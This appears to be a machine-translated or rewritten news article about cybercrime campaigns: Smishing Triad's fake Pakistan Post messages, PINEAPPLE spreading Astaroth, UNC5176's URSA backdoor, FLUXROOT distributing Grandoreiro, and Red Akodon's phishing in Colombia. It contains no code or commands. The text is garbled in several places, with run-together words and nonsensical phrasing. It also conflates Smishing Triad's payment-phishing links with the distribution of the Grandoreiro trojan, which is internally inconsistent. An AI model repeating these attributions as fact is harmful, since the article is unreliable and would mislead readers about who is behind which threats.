Pakistan has become the latest target of a group of cybercriminals called the Smishing Triad, marking the first expansion of its business outside the EUSaudi Arabia, the United Arab Emirates and the United States.
Grandoreirowhat does this trojan consist of
“The group’s latest tactic is to send malicious messages in the name of Pakistan Post to mobile carrier customers via iMessage and SMS“, has said Resecurity in a report published earlier this week. “The goal is to steal their personal and financial information.“, obviously all to put the banking Trojan into circulation Grandoreiroclassic deceptive link strategy.
It is believed that cyber criminals, believed to be Chinese speakersexploit stolen databases sold on the dark web to send fake SMS messages, inviting recipients to click on links under the guise of informing them of a failed package delivery and urging them to update their address.
Users who end up clicking on links with Grandoreiro in it are directed to fake websites that ask them to enter their financial information as part of a supposed service fee charged for the drop-off.
This is how Grandoreiro is put into circulation, essentially.
“Apart from Pakistan Post, the group has also been involved in detecting multiple fake delivery package scams“Resecurity said. “These scams primarily targeted individuals waiting for legitimate packages from reputed courier services such as TCS, Leopard, and FedEx.”
Grandoreiro is not, however, the only cyber threat
Grandoreiro is not the only banking trojan circulating; the development of the story, in fact, comes as Google has revealed the details of another group of cyber criminals that corresponds to the name of PINEAPPLE which uses tax and financial themed bait in spam messages to entice Brazilian users to open malicious links or files that they ultimately lead to the deployment of malware Astaroth (also known as Guildma), who steals information.
“PINEAPPLE often abuses legitimate cloud services in their attempts to distribute malware to users in Brazil“, they have said the Mandiant and Google’s Threat Analysis Group (TAG). “The group has experimented with a number of cloud platforms, including Google Cloud, Amazon AWS, Microsoft Azure and others.”
It is worth noting that the abuse of Google Cloud Run to spread Astaroth has been reported by Cisco Talos in early February, describing it as a high-volume malware distribution campaign targeting users in Latin America (LATAM) and Europe.
The internet giant said it had also observed a Brazil-based cyber threat cluster that tracks as UNC5176 and which targets the financial services, healthcare, retail and hospitality industries with a backdoor called URSA that can steal login credentials for various banking, cryptocurrency sites and email clients.
Deceptive links, including through deceptive advertisements
The attacks exploit email and malvertising campaigns as distribution vectors for a ZIP file containing an HTML Application (HTA) file that, when opened, releases a Visual Basic (VBS) script responsible for contacting a remote server and retrieving a second stage VBS file.
The downloaded VBS file then proceeds to run a series of anti-sandbox and anti-VM checks, after which it begins communications with a command and control (C2) server to retrieve and execute the URSA payload.
A convenient, financially motivated third party based in Latin America highlighted by Google is FLUXROOT, which is linked to the distribution of Grandoreiro banking trojan; the company said it removed adversary-hosted phishing pages in 2023 on Google Cloud that impersonated Mercado Pago with the goal of stealing user credentials.
“More recently, FLUXROOT has continued distribution of Grandoreiro, using cloud services such as Azure and Dropbox to serve the malware“Google said.
The revelation follows the emergence of a new hacker group dubbed Red Akodon, which has been seen propagating various remote access trojans such as AsyncRAT, Quasar RAT, Remcos RAT and XWorm via phishing messages designed to collect bank account detailsemail accounts and other credentials.
Targets of the campaign, running since April 2024, include government, healthcare and education organizations, as well as financial, manufacturing, food, service and transportation sectors in Colombia.
“Red Akodon’s initial access vector is primarily through phishing emails, used as a pretext for purported lawsuits and court summons, apparently coming from Colombian institutions such as the Fiscalía General de la Nación and the Juzgado 06 civil of the Bogotá circuit“, has said the Mexican cybersecurity company Scitum.
#Grandoreiro #banking #trojan #hits #Brazil #Pakistan
